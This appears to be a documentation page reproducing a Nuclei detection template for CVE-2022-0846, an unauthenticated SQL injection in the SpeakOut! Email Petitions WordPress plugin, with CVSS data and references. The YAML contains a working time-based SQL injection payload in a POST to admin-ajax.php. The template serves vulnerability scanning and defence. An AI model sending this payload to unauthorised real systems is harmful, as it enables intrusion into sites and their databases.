Skip to content
Nuclei Templates

SpeakOut Email Petitions < 2.14.15.1 - SQL Injection

ID: CVE-2022-0846

Severity: critical

Author: theamanrawat

Tags: time-based-sqli,cve,cve2022,wordpress,wp-plugin,wp,unauth,wpscan,sqli,speakout,speakout-email-petitions,speakout\!_email_petitions_project

Description

Section titled “Description”

The SpeakOut! Email Petitions WordPress plugin before 2.14.15.1 does not sanitise and escape the id parameter before using it in a SQL statement via the dk_speakout_sendmail AJAX action, leading to an SQL Injection exploitable by unauthenticated users.

YAML Source

Section titled “YAML Source”
id: CVE-2022-0846


info:
  name: SpeakOut Email Petitions < 2.14.15.1 - SQL Injection
  author: theamanrawat
  severity: critical
  description: |
    The SpeakOut! Email Petitions WordPress plugin before 2.14.15.1 does not sanitise and escape the id parameter before using it in a SQL statement via the dk_speakout_sendmail AJAX action, leading to an SQL Injection exploitable by unauthenticated users.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
  remediation: Fixed in version 2.14.15.1
  reference:
    - https://wpscan.com/vulnerability/b030296d-688e-44a4-a48a-140375f2c5f4
    - https://wordpress.org/plugins/speakout/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0846
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/DharmaDoll/Search-Poc-from-CVE
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-0846
    cwe-id: CWE-89
    epss-score: 0.04032
    epss-percentile: 0.92073
    cpe: cpe:2.3:a:speakout\!_email_petitions_project:speakout\!_email_petitions:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: speakout\!_email_petitions_project
    product: speakout\!_email_petitions
    framework: wordpress
  tags: time-based-sqli,cve,cve2022,wordpress,wp-plugin,wp,unauth,wpscan,sqli,speakout,speakout-email-petitions,speakout\!_email_petitions_project


http:
  - raw:
      - |
        @timeout: 20s
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        action=dk_speakout_sendmail&id=12+AND+(SELECT+5023+FROM+(SELECT(SLEEP(6)))Fvrh)--+VoFu


    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains(body, "Your signature has been added") || contains(body, "This petition has already been signed using your email address")'
        condition: and
# digest: 4b0a00483046022100f718c85e6038b244360942feb445420414d79e0de91b419a82ab83d4e94052c9022100ed68fae979450feb02220bc881e7018d6c69ab7a81996cba527327facaed70af:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-0846.yaml"

View on Github